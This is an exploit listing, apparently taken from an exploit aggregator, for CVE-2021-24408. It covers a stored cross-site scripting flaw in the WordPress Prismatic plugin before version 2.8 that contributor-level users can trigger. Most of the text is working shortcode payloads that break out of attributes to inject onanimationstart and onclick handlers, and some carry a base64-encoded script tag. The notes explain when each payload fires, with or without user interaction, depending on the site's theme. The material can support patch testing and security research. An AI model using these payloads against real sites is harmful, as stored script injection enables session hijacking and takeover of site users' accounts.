Exploit for Prismatic < 2.8 - Contributor+ Stored XSS CVE-2021-24408

Name: Exploit for Prismatic < 2.8 - Contributor+ Stored XSS CVE-2021-24408
Rating: 5 (268 reviews)

2021-06-21 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:51855853-E7BD-425F-802C-824209F4F84D
This contains three XSS (all injected at different locations).

[prismatic_code class='hello" style="animation-name:twentytwentyone-close-button-transition;" onanimationstart="alert(1)']
[prismatic_encoded style=%%animation-name:twentytwentyone-close-button-transition;%% onanimationstart=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


The first two payloads via the animation-name/onanimationstart are specific to the Twenty Twenty-One theme (and will be triggered w/o user interaction other than accessing the page)

To try with another theme (requires the user to click on the generated elements in the page to trigger the first two XSS):
[prismatic_code class='hello" onclick="alert(1)']
[prismatic_encoded onclick=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+ = base64("<script>alert(origin)</script>")